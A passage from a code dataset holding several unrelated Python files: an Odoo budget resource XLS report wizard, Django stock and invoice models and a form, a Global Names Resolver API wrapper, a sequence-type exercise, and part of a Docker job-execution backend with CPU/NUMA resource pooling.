c: c.type == 'aux')\n return resources\n\n @api.model\n def get_resources(self,material,labor,equipment):\n values = self.budget_id.concept_ids\n domain = []\n if material:\n domain.append('material')\n if equipment:\n domain.append('equip')\n if labor:\n domain.append('labor')\n resources = values.filtered(lambda c: c.type in domain).mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n return resources\n\n @api.model\n def get_resources_total(self,material,labor,equipment,aux):\n values = self.budget_id.concept_ids\n result = []\n if material:\n total_material = 0\n resources = values.filtered(lambda c: c.type in 'material').mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n for mat in resources:\n total_material += self.get_total(mat.id)\n result.append({'name':'Total Materiales','amount': total_material})\n\n if equipment:\n total_equip = 0\n resources = values.filtered(lambda c: c.type in 'equip').mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n for eqp in resources:\n total_equip += self.get_total(eqp.id)\n result.append({'name':'Total Equipos','amount': total_equip})\n\n if labor:\n total_labor = 0\n resources = values.filtered(lambda c: c.type in 'labor').mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n for lab in resources:\n total_labor += self.get_total(lab.id)\n result.append({'name':'Total Mano de Obra','amount': total_labor})\n\n if aux:\n total_aux = self.budget_id.amount_total_other\n result.append({'name':'Total Otros','amount': total_aux})\n\n return result\n\n\n @api.onchange('equipment', 'material', 'labor','aux')\n def onchange_resource(self):\n self.resource_all = True if (self.equipment and self.material and self.labor and self.aux) else False\n\n @api.onchange('resource_all')\n def onchange_resource_all(self):\n if not self.resource_all and (self.equipment and self.material and self.labor and self.aux):\n self.equipment = self.material = self.labor = self.aux = False\n elif self.resource_all:\n self.equipment = self.material = self.labor = self.aux = True\n\n def print_report(self):\n return self.env.ref('base_bim_2.bim_budget_resource').report_action(self)\n\n def get_resource_type(self,res_type):\n result = ''\n if res_type == 'aux':\n result = 'FUNCION / ADMINISTRATIVO'\n elif res_type == 'H':\n result = 'MANO DE OBRA'\n elif res_type == 'M':\n result = 'MATERIAL'\n elif res_type == 'Q':\n result = 'EQUIPO'\n return result\n\n\n def check_report_xls(self):\n budget = self.budget_id\n workbook = xlwt.Workbook(encoding=\"utf-8\")\n worksheet = workbook.add_sheet('Recursos')\n file_name = 'Recursos'\n style_title = xlwt.easyxf('font: name Times New Roman 180, color-index black, bold on; align: wrap yes, horiz left')\n style_border_table_top = xlwt.easyxf('borders: left thin, right thin, top thin, bottom thin; font: bold on;')\n style_border_table_details = xlwt.easyxf('borders: bottom thin;')\n worksheet.write_merge(0, 0, 0, 4, \"LISTADO DE RECURSOS\", style_title)\n worksheet.write_merge(1,1,0,2, \"Obra\")\n worksheet.write_merge(1,1,3,5, budget.name)\n worksheet.write_merge(1,1,6,8, \"Fecha de Impresión\")\n worksheet.write_merge(2,2,0,2, budget.project_id.nombre)\n worksheet.write_merge(2,2,3,5, budget.code)\n worksheet.write_merge(2,2,6,8, datetime.now().strftime('%d-%m-%Y'))\n\n # Header table\n worksheet.write_merge(4,4,0,0, \"Código\", style_border_table_top)\n worksheet.write_merge(4,4,1,5, \"Recurso\", style_border_table_top)\n worksheet.write_merge(4,4,6,6, \"Tipo\", style_border_table_top)\n worksheet.write_merge(4,4,7,7, \"Unidad\", style_border_table_top)\n worksheet.write_merge(4,4,8,8, \"Cantidad\", style_border_table_top)\n worksheet.write_merge(4,4,9,9, \"Peso\", style_border_table_top)\n worksheet.write_merge(4,4,10,10, \"Costo\", style_border_table_top)\n resources = self.get_resources(self.material,self.labor,self.equipment)\n functions = self.get_function(self.aux)\n row = 5\n for res in resources:\n weight = round(self.get_weight(res.id),2)\n worksheet.write_merge(row,row,0,0, res.code, style_border_table_details)\n worksheet.write_merge(row,row,1,5, res.name, style_border_table_details)\n worksheet.write_merge(row,row,6,6, self.get_resource_type(res.resource_type), style_border_table_details)\n worksheet.write_merge(row,row,7,7, res.uom_id.name, style_border_table_details)\n worksheet.write_merge(row,row,8,8, round(self.get_quantity(res.id),3), style_border_table_details)\n if weight <= 0:\n worksheet.write_merge(row,row,9,9, \"-\", style_border_table_details)\n else:\n worksheet.write_merge(row,row,9,9, weight, style_border_table_details)\n worksheet.write_merge(row,row,10,10, round(self.get_total(res.id),2), style_border_table_details)\n row += 1\n if functions:\n for res in functions:\n worksheet.write_merge(row,row,0,0, res.code, style_border_table_details)\n worksheet.write_merge(row,row,1,5, res.name, style_border_table_details)\n worksheet.write_merge(row,row,6,6, self.get_resource_type(res.type), style_border_table_details)\n worksheet.write_merge(row,row,7,7, res.uom_id.name, style_border_table_details)\n worksheet.write_merge(row,row,8,8, res.amount_compute, style_border_table_details)#round(self.get_quantity_aux(res),3)\n worksheet.write_merge(row,row,9,9, \"-\", style_border_table_details)\n worksheet.write_merge(row,row,10,10, round(self.get_total_aux(res),2), style_border_table_details)\n row += 1\n\n totals = self.get_resources_total(self.material,self.labor,self.equipment,self.aux)\n for tot in totals:\n worksheet.write_merge(row,row,7,8, tot['name'], style_border_table_details)\n worksheet.write_merge(row,row,9,10, tot['amount'], style_border_table_details)\n row += 1\n\n fp = BytesIO()\n workbook.save(fp)\n fp.seek(0)\n data = fp.read()\n fp.close()\n data_b64 = base64.encodestring(data)\n doc = self.env['ir.attachment'].create({\n 'name': '%s.xls' % (file_name),\n 'datas': data_b64,\n })\n\n return {\n 'type': \"ir.actions.act_url\",\n 'url': \"web/content/?model=ir.attachment&id=\" + str(\n doc.id) + \"&filename_field=name&field=datas&download=true&filename=\" + str(doc.name),\n 'target': \"self\",\n 'no_destroy': False,\n }\n","sub_path":"base_bim_2/wizard/bim_resource_report.py","file_name":"bim_resource_report.py","file_ext":"py","file_size_in_byte":10770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"588946264","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\n\n# Create your models here.\nfrom django.db.models import Sum\n\nfrom danibraz.checkout.validate_error_invoice import validate_quantity\n\nOPERACAO_CHOICES = (\n ('C', 'COMPRA'),\n ('V', 'VENDA'),\n ('D', 'DIVIDENDOS'),\n ('S', 'SPLIT')\n)\n\n\nPAPEL_CHOICES = (\n ('ABEV3', 'AMBEV S/A'),\n ('BBAS3', 'BRASIL'),\n ('BBDC3', 'BRADESCO 3'),\n ('BBDC4', 'BRADESCO 4'),\n ('BBSE3', 'BBSEGURIDADE'),\n ('BRAP4', 'BRADESPAR'),\n ('BRFS3', 'BRF SA'),\n ('BRKM5', 'BRASKEM'),\n ('BRML3', 'BR MALLS PAR'),\n ('BVMF3', 'BMFBOVESPA'),\n ('CCRO3', 'CCR SA'),\n ('CIEL3', 'CIELO'),\n ('CMIG4', 'CEMIG'),\n ('CSAN3', 'COSAN'),\n ('CSNA3', 'SID NACIONAL'),\n ('ECOR3', 'ECORODOVIAS'),\n ('ELET3', 'ELETROBRAS'),\n ('EMBR3', 'EMBRAER'),\n ('EQTL3', 'EQUATORIAL'),\n ('ESTC3', 'ESTACIO PART'),\n ('FIBR3', 'FIBRIA'),\n ('GGBR4', 'GERDAU'),\n ('GOAU4', 'GERDAU MET'),\n ('HYPE3', 'HYPERMARCAS'),\n ('ITSA4', 'ITAUSA'),\n ('ITUB4', 'ITAUUNIBANCO'),\n ('JBSS3', 'JBS'),\n ('KLBN11', 'KLABIN S/A'),\n ('KROT3', 'KROTON'),\n ('LAME4', 'LOJAS AMERIC'),\n ('LREN3', 'LOJAS RENNER'),\n ('MRVE3', 'MRV'),\n ('MULT3', 'MULTIPLAN'),\n ('NATU3', 'NATURA'),\n ('PCAR4', 'P.ACUCAR-CBD'),\n ('PETR3', 'PETROBRAS'),\n ('PETR4', 'PETROBRAS'),\n ('QUAL3', 'QUALICORP'),\n ('RADL3', 'RAIADROGASIL'),\n ('RAIL3', 'RUMO S.A.'),\n ('RENT3', 'LOCALIZA'),\n ('SANB11', 'SANTANDER BR'),\n ('SBSP3', 'SABESP'),\n ('SUZB5', 'SUZANO PAPEL'),\n ('TAEE11', 'TAESA'),\n ('UGPA3', 'ULTRAPAR'),\n ('USIM5', 'USIMINAS'),\n ('VALE3', 'VALE'),\n ('VIVT4', 'TELEF BRASIL'),\n ('WEGE3', 'WEG')\n)\n\n\nclass Lancamento(models.Model):\n data = models.DateField('Data')\n # papel = models.CharField('Papel',max_length=100, choices=PAPEL_CHOICES)\n # operacao = models.CharField('Operação',max_length=100, choices=OPERACAO_CHOICES)\n # quantidade = models.PositiveIntegerField('Quantidade', default=1)\n\n class Meta:\n verbose_name_plural = 'lançamentos'\n verbose_name = 'lançamento'\n\n def __str__(self):\n return str(self.data)\n\n def get_absolute_url(self):\n from django.urls import reverse\n return reverse('checkout:lancamento_editar', args=[str(self.id)])\n\n\nclass LancamentoItem(models.Model):\n lancamento = models.ForeignKey('checkout.Lancamento', related_name='lancamento_item')\n symbol = models.CharField('Papel',max_length=100, choices=PAPEL_CHOICES)\n quantity = models.PositiveIntegerField('Quantidade', default=1)\n price = models.DecimalField('Preço', decimal_places=2, max_digits=8)\n\n class Meta:\n verbose_name = 'Item do Lançamento'\n verbose_name_plural = 'Itens do Lancamento'\n\n def __str__(self):\n return '{} [{}]'.format(self.lancamento, self.quantity)\n\n\n#----------------------------------------------------------------------------------\nclass Papel(models.Model):\n symbol = models.CharField('Papel', max_length=100, choices=PAPEL_CHOICES)\n stock = models.PositiveSmallIntegerField('Estoque')\n created = models.DateTimeField('created', auto_now_add=True)\n modified = models.DateTimeField('modified', auto_now=True)\n\n class Meta:\n verbose_name = 'Papel'\n verbose_name_plural = 'Papeis'\n\n def __str__(self):\n return self.symbol\n\n\nclass Invoice(models.Model):\n customer = models.ForeignKey('persons.Client')\n emissao = models.DateField('emissao')\n total = models.IntegerField('Total')\n created = models.DateTimeField('created', auto_now_add=True)\n modified = models.DateTimeField('modified', auto_now=True)\n\n def get_absolute_url(self):\n return reverse('checkout:invoice_edit', args=(self.pk,))\n\n # def get_absolute_url(self):\n # return reverse('persons:clients_editar', args=[str(self.id)])\n\n @property\n def total_prop(self):\n return self.nota.all().aggregate(Sum('unit_price'))['unit_price__sum'] #+ self.custo_bovespa.all().aggregate(Sum('emolumentos'))['emolumentos__sum']\n\n\n\n\nclass Item(models.Model):\n invoice = models.ForeignKey(Invoice, related_name='nota')\n title = models.ForeignKey('checkout.Papel')\n quantity = models.PositiveSmallIntegerField('quantity', validators=[validate_quantity])\n unit_price = models.DecimalField('unit price', max_digits=10, decimal_places=2)\n created = models.DateTimeField('created', auto_now_add=True)\n modified = models.DateTimeField('modified', auto_now=True)\n\n class Meta:\n verbose_name = 'Item da Nota'\n verbose_name_plural = 'Itens da Nota'\n #unique_together = (('invoice', 'title'),)\n\ndef post_save_item(sender, instance, **kwargs):\n if instance.title.stock >= instance.quantity:\n instance.title.stock -= instance.quantity\n instance.title.save()\n else:\n # instance.title.stock = 0\n # instance.title.save()\n #raise ValidationError('O valor do estoque ficará negativo, Não foi salvo')\n errors_message = 'A nota não foi salva.'\n\n\nmodels.signals.post_save.connect(\n post_save_item, sender=Item, dispatch_uid='post_save_item'\n)","sub_path":"danibraz/checkout/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"637620280","text":"#-*- coding: utf-8 -*-\n\nfrom django import forms\nfrom .models import Person\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass PersonForm(forms.ModelForm):\n class Meta:\n model = Person\n exclude = ['slug']\n labels = {\n 'name': _(u'Imię'),\n 'surname': _(u'Nazwisko'),\n 'birthday': _(u'Data urodzenia'),\n 'nationality': _(u'Narodowość'),\n 'type': _(u'Rodzaj'),\n 'position': _(u'Pozycja'),\n 'team': _(u'Zespół'),\n 'photo': _(u'Zdjęcie')\n }\n","sub_path":"person/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"468504117","text":"\"\"\"\nWrappers for GNR API calls and derived functions.\n\nAPI documentation can be found at: http://resolver.globalnames.org/api\n\"\"\"\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nimport requests\n\nfrom bdcctools.taxonomic.utils import expand_result\n\nAPI_URL = \"http://resolver.globalnames.org/name_resolvers.json\"\n\n\ndef resolve(\n names: Union[list, pd.Series, str],\n data_source_ids: list = None,\n resolve_once: bool = False,\n best_match_only: bool = False,\n with_context: bool = False,\n with_vernaculars: bool = False,\n with_canonical_ranks: bool = False\n) -> pd.DataFrame:\n \"\"\"\n Receives a list of names and resolves each against the entire resolver\n database or against specific data sources using the Global Names\n Resolver (GNR) API. Underlying resolving and scoring algorithms are\n described at: http://resolver.globalnames.org/about\n\n Parameters\n ----------\n names: List of species names to resolve.\n data_source_ids: List of specific data sources IDs to resolve\n against. A list of all the available data\n sources and their IDs can be found at:\n http://resolver.globalnames.org/data_sources.\n resolve_once: Find the first available match instead of\n matches across all data sources with all\n possible renderings of a name.\n best_match_only: Returns just one result with the highest\n score.\n with_context: Reduce the likelihood of matches to taxonomic\n homonyms. When True, a common taxonomic\n context is calculated for all supplied names\n from matches in data sources that have\n classification tree paths. Names out of\n determined context are penalized during\n score calculation.\n with_vernaculars: Return 'vernacular' field to present common\n names provided by a data source for a\n particular match.\n with_canonical_ranks: Returns 'canonical_form' with infraspecific\n ranks, if they are present.\n\n Returns\n -------\n List with the results for each name in names.\n\n Notes\n -----\n More information on the GNR API can be found at:\n http://resolver.globalnames.org/api\n \"\"\"\n if isinstance(names, str):\n names = [names]\n if data_source_ids is None:\n data_source_ids = []\n\n # Apparently, GNR API does not accept Booleans so they need to be\n # converted to lowercase strings first.\n params = {\n \"data\": \"\\n\".join(names),\n \"data_source_ids\": \"|\".join(data_source_ids),\n \"resolve_once\": str(resolve_once).lower(),\n \"best_match_only\": str(best_match_only).lower(),\n \"with_context\": str(with_context).lower(),\n \"with_vernaculars\": str(with_vernaculars).lower(),\n \"with_canonical_ranks\": str(with_canonical_ranks).lower()\n }\n\n try:\n response = requests.post(API_URL, json=params)\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n raise Exception(f\"Error calling Global Name Resolver API. {err}\")\n\n data = response.json()[\"data\"]\n\n return pd.json_normalize(data, record_path=\"results\", meta=\"supplied_name_string\")\n\n\ndef get_classification(\n names: Union[list, pd.Series, str],\n add_supplied_names: bool = False,\n add_source: bool = False,\n expand: bool = True,\n **kwargs,\n) -> pd.DataFrame:\n \"\"\"\n Gets the complete classification of multiple scientific names using\n the Global Names Resolver.\n\n Parameters\n ----------\n names: Scientific name(s) to get results for.\n add_supplied_names: Add supplied scientific names column to the\n resulting DataFrame.\n add_source: Add source column to the resulting DataFrame.\n expand: Whether to expand result rows to match `names`\n size. If False, the number of rows will correspond\n to the number of unique names in `names`. Only\n has effect if best_match_only=True is passed.\n kwargs: Keyword arguments of the resolve function.\n\n Returns\n -------\n Classification DataFrame.\n \"\"\"\n if isinstance(names, (list, str)):\n names = pd.Series(names)\n\n unique_names = pd.Series(names.dropna().unique())\n result = resolve(unique_names, **kwargs)\n\n ranks = [\"kingdom\", \"phylum\", \"class\", \"order\", \"family\", \"genus\", \"species\"]\n df = pd.DataFrame(columns=ranks, index=result.index)\n rank_indices = result[\"classification_path_ranks\"].str.split(\"|\", expand=True)\n path_indices = result[\"classification_path\"].str.split(\"|\", expand=True)\n\n for rank in ranks:\n mask = (rank_indices == rank).any(axis=1)\n rank_idx = np.nonzero(rank_indices[mask].values == rank)\n rank_paths = path_indices[mask].values[rank_idx]\n df.loc[mask, rank] = rank_paths\n\n if add_supplied_names:\n df[\"supplied_name\"] = unique_names\n if add_source:\n df[\"source\"] = result[\"data_source_title\"]\n if kwargs.get(\"best_match_only\"):\n if expand:\n df = expand_result(df, names)\n\n return df\n","sub_path":"bdcctools/taxonomic/web/gnr.py","file_name":"gnr.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351636859","text":"# 区分以下类型哪些是容器序列哪些是扁平序列,哪些是可变序列哪些是不可变序列:\n\n# list - 容器序列, 可变序列\nlist_a = [1, 'a']\nlist_b = list_a\nprint(list_b is list_a) # True\nlist_a[1] = 'b'\nprint(list_b is list_a) # True\n\n# tuple - 容器序列, 不可变序列\ntuple_a = tuple([1, 'a'])\ntry:\n tuple_a[1] = 'b' # TypeError\nexcept TypeError:\n print('tuple object does not support item assignment')\n\n# str - 扁平序列, 不可变序列\nstr_a = 'abcdef'\ntry:\n str_a[0] = 1 # TypeError\nexcept TypeError:\n print('str object does not support item assignment')\n\n# dict - 容器, 可变\ndict_a = { 'a': 10, 'b': 'str'}\ndict_b = dict_a\nprint(dict_b is dict_a) # True\ndict_a['b'] = 12\nprint(dict_b is dict_a) # True\n\n# collections.deque - 容器序列, 可变序列\nfrom collections import deque\ndeque_a = deque([1, 'a'])\ndeque_b = deque_a\nprint(deque_b is deque_a) # True\ndeque_a[1] = 'b'\nprint(deque_b is deque_a) # True","sub_path":"week08/01_exercise.py","file_name":"01_exercise.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"215405292","text":"# vim: set sw=4 ts=4 softtabstop=4 expandtab:\nfrom . BackendBase import *\nimport functools\nimport logging\nimport os\nimport pprint\nimport time\nimport psutil\nimport threading\nimport traceback\nimport requests.exceptions\nimport json\n_logger = logging.getLogger(__name__)\n\n\nclass DockerBackendException(BackendException):\n pass\n\ntry:\n import docker\nexcept ImportError:\n raise DockerBackendException(\n 'Could not import docker module from docker-py')\n\n# Pool of resources.\n# FIXME: We need a way to close all the clients when all runners\n# finish.\nclass ResourcePool:\n \"\"\"\n Resource pool for DockerBackend. It contains a set of resources\n that can be acquired and returned. These resources include\n\n * DockerClient\n * CPUs\n \"\"\"\n def __init__(self, num_jobs, available_cpu_ids, cpus_per_job, use_memset_of_nearest_node):\n assert isinstance(num_jobs, int)\n assert num_jobs > 0\n assert isinstance(available_cpu_ids, set) or available_cpu_ids is None\n assert isinstance(cpus_per_job, int) or cpus_per_job is None\n if cpus_per_job is not None:\n assert cpus_per_job > 0\n if available_cpu_ids is not None:\n assert len(available_cpu_ids) > 0\n assert isinstance(use_memset_of_nearest_node, bool) or use_memset_of_nearest_node is None\n self._num_jobs = num_jobs\n self._available_cpu_ids = available_cpu_ids\n self._cpus_per_job = cpus_per_job\n self._use_memset_of_nearest_node = use_memset_of_nearest_node\n\n # Docker client data structures\n self._docker_clients = dict() # All created clients\n self._docker_client_pool = set() # Available clients\n\n # CPU and memset data structures\n self._numa_nodes = dict() # Maps NUMA node to set of CPU ids\n self._numa_node_pool = dict() # Maps NUMa node to set of available CPU ids\n\n self._lock = threading.Lock()\n\n # Sanity check\n if cpus_per_job is not None and available_cpu_ids is not None:\n assert (num_jobs * cpus_per_job) <= len(available_cpu_ids)\n\n def _lazy_docker_client_init(self):\n # Implicitly assume lock is already held\n if len(self._docker_clients) != 0:\n # Init already happenend\n return\n # Create Docker clients\n for index in range(0, self._num_jobs):\n _logger.info('Creating DockerClient {}'.format(index))\n new_client = docker.APIClient(version='1.24')\n self._docker_clients[id(new_client)] = new_client\n # Add to pool\n self._docker_client_pool.add(id(new_client))\n\n assert len(self._docker_clients) == len(self._docker_client_pool)\n\n def get_docker_client(self):\n with self._lock:\n self._lazy_docker_client_init()\n try:\n docker_client_id = self._docker_client_pool.pop()\n except Exception as e:\n _logger.error('Failed to get client from pool')\n _logger.error(e)\n raise e\n return self._docker_clients[docker_client_id]\n\n def release_docker_client(self, docker_client):\n with self._lock:\n self._lazy_docker_client_init()\n if id(docker_client) not in self._docker_clients:\n raise DockerBackendException('Invalid client released back to pool')\n if id(docker_client) in self._docker_client_pool:\n raise DockerBackendException('Returned client is already in pool')\n # Put back in pool\n self._docker_client_pool.add(id(docker_client))\n\n def _lazy_cpu_and_mem_set_init(self):\n # Implicitly assume lock is already held\n if len(self._numa_nodes) != 0:\n # Init already happened\n return\n if (self._available_cpu_ids is None\n or self._cpus_per_job is None\n or self._use_memset_of_nearest_node is None):\n raise Exception('Cannot do init. One or more params were None')\n import numa\n if not numa.available():\n raise Exception('NUMA not available')\n numa_nodes = list(range(0, numa.get_max_node() + 1))\n cpu_count = 0\n for numa_node in numa_nodes:\n cpus = numa.node_to_cpus(numa_node)\n for cpu_id in cpus:\n if cpu_id in self._available_cpu_ids:\n try:\n self._numa_nodes[numa_node].add(cpu_id)\n except KeyError:\n self._numa_nodes[numa_node] = set()\n self._numa_nodes[numa_node].add(cpu_id)\n try:\n self._numa_node_pool[numa_node].add(cpu_id)\n except KeyError:\n self._numa_node_pool[numa_node] = set()\n self._numa_node_pool[numa_node].add(cpu_id)\n _logger.info('Putting CPU {} in NUMA node {} in resource pool'.format(\n cpu_id, numa_node))\n cpu_count += 1\n else:\n _logger.info('CPU {} in NUMA node {} is NOT IN resource pool'.format(\n cpu_id, numa_node))\n\n if cpu_count == 0:\n raise Exception('Found no available CPUs')\n if cpu_count != len(self._available_cpu_ids):\n raise Exception(\n 'Mismatch between provided available CPU ids and what was found on system')\n assert len(self._numa_node_pool) == len(self._numa_nodes)\n\n def get_cpus(self):\n \"\"\"\n Returns a set of CPU ids for a single job\n \"\"\"\n with self._lock:\n self._lazy_cpu_and_mem_set_init()\n cpu_memset_tuples_to_return = set()\n if self._use_memset_of_nearest_node:\n for numa_node, available_cpus in sorted(\n self._numa_node_pool.items(), key=lambda x:x[0]):\n if len(available_cpus) >= self._cpus_per_job:\n for _ in range(0, self._cpus_per_job):\n cpu = available_cpus.pop()\n cpu_memset_tuples_to_return.add( (cpu, numa_node) )\n break # We are done\n else:\n # Grab any available CPU\n available_cpus = set(functools.reduce(\n lambda a,b: a.union(b),\n self._numa_node_pool.values()))\n cpus_to_grab = set()\n if len(available_cpus) >= self._cpus_per_job:\n for _ in range(0, self._cpus_per_job):\n cpus_to_grab.add(available_cpus.pop())\n # Now remove from pool\n for numa_node, available_cpus_in_node in sorted(\n self._numa_node_pool.items(), key=lambda x:x[0]):\n for cpu_to_grab in cpus_to_grab:\n if cpu_to_grab in available_cpus_in_node:\n cpu_memset_tuples_to_return.add( (cpu_to_grab, numa_node) )\n available_cpus_in_node.remove(cpu_to_grab)\n\n\n if len(cpu_memset_tuples_to_return) != self._cpus_per_job:\n _logger.error('Failed to retrieve CPU resources required for job')\n _logger.error('cpu_memset_tuples_to_return: {}'.format(cpu_memset_tuples_to_return))\n _logger.error('cpus_per_job: {}'.format(self._cpus_per_job))\n raise Exception('Failed to retrieve CPU resources required for job')\n return cpu_memset_tuples_to_return\n\n def release_cpus(self, cpu_ids):\n \"\"\"\n Returns a set of CPU ids\n \"\"\"\n with self._lock:\n self._lazy_cpu_and_mem_set_init()\n assert isinstance(cpu_ids, set)\n for item in cpu_ids:\n assert isinstance(item, int)\n for cpu_to_release in cpu_ids:\n released=False\n for numa_node, available_cpu_ids in self._numa_node_pool.items():\n if cpu_to_release in self._numa_nodes[numa_node]:\n available_cpu_ids.add(cpu_to_release)\n released = True\n break\n if not released:\n raise Exception('Failed to return CPU {} to pool'.format(cpu_to_release))\n\nclass DockerBackend(BackendBaseClass):\n\n def __init__(self, hostProgramPath, workingDirectory, timeLimit, memoryLimit, stackLimit, ctx, **kwargs):\n super().__init__(hostProgramPath, workingDirectory,\n timeLimit, memoryLimit, stackLimit, ctx, **kwargs)\n self._container = None\n self._workDirInsideContainer = '/mnt/'\n self._skipToolExistsCheck = False\n self._userToUseInsideContainer = None\n self._dockerStatsOnExitShimBinary = None\n self._killLock = threading.Lock()\n self._additionalHostContainerFileMaps = dict()\n self._usedFileMapNames = set() # HACK\n self._extra_volume_mounts = dict()\n self._grabbed_cpus = None\n # handle required options\n if not 'image' in kwargs:\n raise DockerBackendException('\"image\" but be specified')\n self._dockerImageName = kwargs['image']\n if not (isinstance(self._dockerImageName, str) and len(self._dockerImageName) > 0):\n raise DockerBackendException('\"image\" must to a non empty string')\n\n # Pretend user default is $USER\n if not 'user' in kwargs:\n kwargs['user'] = '$HOST_USER'\n\n available_cpu_ids = None\n cpus_per_job = None\n self._use_memset_of_nearest_node = None\n self.resource_pinning = False # No resource pinning by default\n requiredOptions = ['image']\n # handle other options\n for key, value in kwargs.items():\n if key in requiredOptions:\n continue\n if key == 'skip_tool_check':\n self._skipToolExistsCheck = value\n if not isinstance(self._skipToolExistsCheck, bool):\n raise DockerBackendException(\n '\"skip_tool_check\" must map to a bool')\n continue\n if key == 'image_work_dir':\n self._workDirInsideContainer = value\n if not (isinstance(self._workDirInsideContainer, str) and len(self._workDirInsideContainer) > 0):\n raise DockerBackendException(\n '\"image_work_dir\" must be a non empty string')\n if not os.path.isabs(value):\n raise DockerBackendException(\n '\"image_work_dir\" must be an absolute path')\n continue\n if key == 'user':\n if not (isinstance(value, str) or isinstance(value, int) or value == None):\n raise DockerBackendException(\n '\"user\" must be integer or a string')\n if value == None:\n self._userToUseInsideContainer = None\n elif isinstance(value, int):\n if value < 0:\n raise DockerBackendException(\n '\"user\" specified as an integer must be >= 0')\n self._userToUseInsideContainer = value\n else:\n # The choice of $ is deliberate because it is not a valid\n # character in a username\n if value == \"$HOST_USER\":\n self._userToUseInsideContainer = \"{}:{}\".format(\n os.getuid(), os.getgid())\n else:\n import re\n if re.match(r'[a-z_][a-z0-9_-]*[$]?', value) == None:\n raise DockerBackendException(\n '\"{}\" is not a valid username'.format(value))\n self._userToUseInsideContainer = value\n continue\n if key == 'docker_stats_on_exit_shim':\n if not isinstance(value, bool):\n raise DockerBackendException(\n '\"docker_stats_on_exit_shim\" should be a boolean')\n if value:\n root = os.path.dirname(os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\n self._dockerStatsOnExitShimBinary = os.path.join(\n root, 'external_deps', 'docker-stats-on-exit-shim')\n _logger.info(\"Looking for '{}'\".format(\n self._dockerStatsOnExitShimBinary))\n if not os.path.exists(self._dockerStatsOnExitShimBinary):\n raise DockerBackendException(\n \"Could not find docker-stats-on-exit-shim at '{}'\".format(self._dockerStatsOnExitShimBinary))\n continue\n if key == 'extra_mounts':\n if not isinstance(value, dict):\n raise DockerBackendException(\n '\"extra_mounts\" should be a dictionary')\n for host_path, props in value.items():\n if not isinstance(host_path, str):\n raise DockerBackendException(\n '\"extra_mounts\" keys should be a string')\n if not os.path.isabs(host_path):\n raise DockerBackendException(\n '\"host_path\" (\"{}\") must be an absolute path'.format(\n host_path))\n if not isinstance(props, dict):\n raise DockerBackendException(\n '\"{}\" should map to a dictionary'.format(\n in_container_path))\n in_container_path = None\n read_only = True\n try:\n in_container_path = props['container_path']\n except KeyError:\n raise DockerBackendException('\"container_path\" key is missing from {}'.format(props))\n if 'read_only' in props:\n read_only = props['read_only']\n if not isinstance(read_only, bool):\n raise DockerBackendException('\"read_only\" must be a boolean')\n if not os.path.isabs(in_container_path):\n raise DockerBackendException(\n 'Container mount point \"{}\" should be absolute'.format(\n in_container_path))\n if in_container_path.startswith(self._workDirInsideContainer):\n raise DockerBackendException(\n 'Container mount point \"{}\" cannot be based in \"{}\"'.format(\n in_container_path,\n self._workDirInsideContainer))\n self._extra_volume_mounts[host_path] = {\n 'bind': in_container_path,\n 'ro': read_only,\n }\n continue\n if key == 'resource_pinning':\n self.resource_pinning = True\n if not isinstance(value, dict):\n raise DockerBackendException(\n 'resource_pinning should map to a dictionary')\n if 'cpu_ids' not in value:\n raise DockerBackendException(\n 'cpu_ids key must be present in resource_pinning')\n available_cpu_ids = value['cpu_ids']\n if not isinstance(available_cpu_ids, list):\n raise DockerBackendException(\n 'cpu_ids must be a list')\n # Turn into a set\n available_cpu_ids = set(available_cpu_ids)\n if len(available_cpu_ids) == 0:\n raise DockerBackendException(\n 'cpu_ids must not be empty')\n if 'cpus_per_job' not in value:\n raise DockerBackendException(\n 'cpus_per_job key must be present in resource_pinning')\n cpus_per_job = value['cpus_per_job']\n if not isinstance(cpus_per_job, int):\n raise DockerBackendException(\n 'cpus_per_job must be an integer')\n if cpus_per_job < 1:\n raise DockerBackendException(\n 'cpus_per_job >= 1')\n self._use_memset_of_nearest_node = False # Default\n if 'use_memset_of_nearest_node' in value:\n self._use_memset_of_nearest_node = value['use_memset_of_nearest_node']\n if not isinstance(self._use_memset_of_nearest_node, bool):\n raise DockerBackendException(\n 'cpus_per_job >= 1')\n # Sanity check\n if (self.ctx.num_parallel_jobs * cpus_per_job) > len(available_cpu_ids):\n raise DockerBackendException(\n 'Number of cpus required exceeds number of available CPUs')\n continue\n\n # Not recognised option\n raise DockerBackendException(\n '\"{}\" key is not a recognised option'.format(key))\n\n # HACK: Try to prevent program path name being used in calls to addFileToBackend()\n if self.programPath().startswith('/tmp') and os.path.dirname(self.programPath()) == '/tmp':\n self._usedFileMapNames.add(os.path.basename(self.programPath()))\n\n # Initialise global client pool. This is shared amoung all runners.\n self._resource_pool = None\n try:\n self._resource_pool, success = self.ctx.get_object('DockerBackend.ResourcePool')\n if not success:\n # There is no existing resource pool. Make one\n self._resource_pool = ResourcePool(\n num_jobs=self.ctx.num_parallel_jobs,\n available_cpu_ids=available_cpu_ids,\n cpus_per_job=cpus_per_job,\n use_memset_of_nearest_node=self._use_memset_of_nearest_node\n )\n success = self.ctx.add_object('DockerBackend.ResourcePool', self._resource_pool)\n # Handle race. If someone managed to make a resource pool before we did\n # use theirs instead\n if not success:\n self._resource_pool, success = 